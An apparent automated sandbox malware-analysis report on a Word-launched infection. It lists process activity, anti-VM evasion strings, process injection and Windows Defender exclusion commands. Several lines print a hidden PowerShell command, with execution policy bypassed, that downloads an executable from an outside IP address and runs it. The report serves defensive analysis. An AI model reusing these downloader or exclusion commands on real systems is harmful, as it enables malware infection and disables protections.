                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 9.2.task.exe.22ff1b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2528Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2204Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044Thread sleep count: 6172 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044Thread sleep count: 620 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964Thread sleep count: 35 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1684Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 284Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2300Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeWindow / User API: threadDelayed 6172
                    Source: C:\Users\user\AppData\Roaming\task.exeWindow / User API: threadDelayed 620
                    Source: C:\Users\user\AppData\Roaming\task.exeWindow / User API: threadDelayed 9581
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: task.exe, 00000009.00000002.447908400.00000000008EA000.00000004.00000001.sdmpBinary or memory string: VMware_S
                    Source: task.exe, 00000009.00000003.446953826.0000000005531000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory written: C:\Users\user\AppData\Roaming\task.exe base: 400000 value starts with: 4D5A
                    Adds a directory exclusion to Windows DefenderShow sources
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Injects files into Windows applicationShow sources
                    Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policyShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
